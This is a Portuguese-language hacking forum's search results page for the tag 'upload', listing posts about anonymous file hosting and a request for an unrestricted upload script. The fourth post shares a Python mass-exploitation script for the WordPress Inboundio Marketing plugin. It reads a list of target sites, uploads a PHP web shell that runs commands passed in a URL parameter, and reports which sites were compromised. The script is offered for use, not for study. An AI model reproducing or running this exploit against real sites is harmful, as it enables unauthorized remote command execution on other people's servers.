Jump to content

Search the Community

Showing results for tags 'upload'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Fsociety Brasil
    • Administration
    • Sugestões
    • Apresentação de Membros
  • Desenvolvimento
    • Ferramentas
    • Projetos
    • Programação
  • Segurança da Informação
    • Hacker
    • Cracker
    • Leaks
    • Engenharia Social
    • CTF
    • Bug Bounty
  • Sistemas Operacionais (S.O)
    • Linux
    • Windows
    • Mac
  • Hardware
    • Tutoriais e Ferramentas
    • Dúvidas e discussões
    • Arduino
    • Raspberry
  • Off-Topic
    • BioHacking
    • Games, Emuladores, Crack, Cheater e afins
    • Cursos, apostilas e livros
    • Ciência, Tecnologia, Sociologia, Filosofia e Psicologia
    • Notícias, novidades, acontecimentos e teorias da conspiração
    • Design
    • Random, dúvidas e discussões

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Location


Sex

Found 4 results

  1. Myfiles Olá, hoje venho vos apresentar um novo serviço de compartilhamento de arquivo de forma gratuita e 100% ANÔNIMA!!! Não tem muito o que falar, apenas que você poderá fazer upload de seus arquivos e disponibilizá-los para seus amigos e seguidores sem necessitar de um cadastro ou informações. É só acessar e compartilhar. >>> Clique aqui para acessar! <<<
  2. olá pessoal , estou aqui para pedir ajuda para vcs,eu estou querendo criar um site que de para fazer upload de qualquer arquivo, sim eu já pesquisei no google ,achei muitos ,mas uns não funciona outros tem limites de extensões(Ex: jpg, png, pdf , e etc ) eu quero um código que aceite todos os tipos de extensões .Desde já agradeço
  3. João Escobar

    DARK_FILES

    O DARK_FILES está finalizado galera! Ontem postei sobre ele no Facebook pedindo ajuda na questão da criptografia e, hoje, após um dia inteiro trabalhando nele consegui fazer uma criptografia FODA e finalizá-lo! Pra quem tiver interesse em conhecer: http://darkfiles.hk.tn/ O QUE É: Hospedagem de arquivos 100% anônima (criptografia individual), limpa (sem anúncios/espera), segura e sem deixar rastros (server anon na Espanha, rs). Aqui seus arquivos 'dark' ficarão seguros. ~Por enquanto~ o upload máximo é 10MB, mas logo logo vai ser alterado pra mais. QUALQUER crítica/sugestão é muito bem vinda e vai ajudar muito. Fiz esse projeto pra estudo, com inspiração no antigo ObscuredFiles. Façam bom uso
  4. Eae pessoal, criei esse exploit em massa, para explorar uma vulnerabilidade no tema Inboundio, a qual lhe permite enviar arquivos (Shell) de forma arbitrária. #!/usr/bin/python #Escrito por Derick Santos #Conheca a FSociety Brasil: https://www.fsocietybrasil.org.br/ try: try: from colorama import * import colorama except: print "[!] ERRO! Necessario a biblioteca COLORAMA! Instale com - \n\n pip install colorama OU easy_install colorama" sys.exit(1) try: import requests except: print Fore.RED+"[!] ERRO! Necessario a biblioteca REQUESTS! Instale com - \n\n pip install requests OU easy_install requests" sys.exit(1) import platform import time import sys import os so = platform.system() if so == "Windows": cleaning = os.system("cls") else: cleaning = os.system("clear") try: lista = raw_input(Fore.WHITE+"Lista de sites: ") list = open(lista, "rb") except: print Fore.RED+"[!]"+Fore.WHITE+" Erro! O arquivo nao foi encontrado." for sites in list: sites = sites.rstrip() if "http://" not in sites: sites = "http://"+sites else: sites = sites print Fore.BLUE+"\n[!]"+Fore.WHITE+" SITE - {}\n".format(sites) payload = {"file" : "<?php system($_GET['shell']); ?>" } path_vul = "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" id_vul = sites+path_vul id_process = requests.get(id_vul) if id_process.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" O SITE PARECE SER VULNERAVEL!" time.sleep(3) print Fore.GREEN+"[!]"+Fore.WHITE+" Testando exploit!" exploiting = requests.post(id_vul,files=payload) if exploiting.status_code == 200: verifica_shell = requests.get("/inboundio-marketing/admin/partials/uploaded_csv/?shell=") if verifica_shell.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" Shell upada! - {}".format(sites+"/inboundio-marketing/admin/partial/uploaded_csv/?shell=[CMD]") else: print Fore.RED+"[!]"+Fore.WHITE+" Shell nao upada!" else: print Fore.RED+"[!]"+Fore.WHITE+" SITE NAO VULNERAVEL!" else: print Fore.RED+"[!]"+Fore.WHITE+"SITE NAO VULNERAVEL!" except KeyboardInterrupt: print Fore.RED+"\n[!]"+Fore.WHITE+" Ate mais!" sys.exit(1)
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.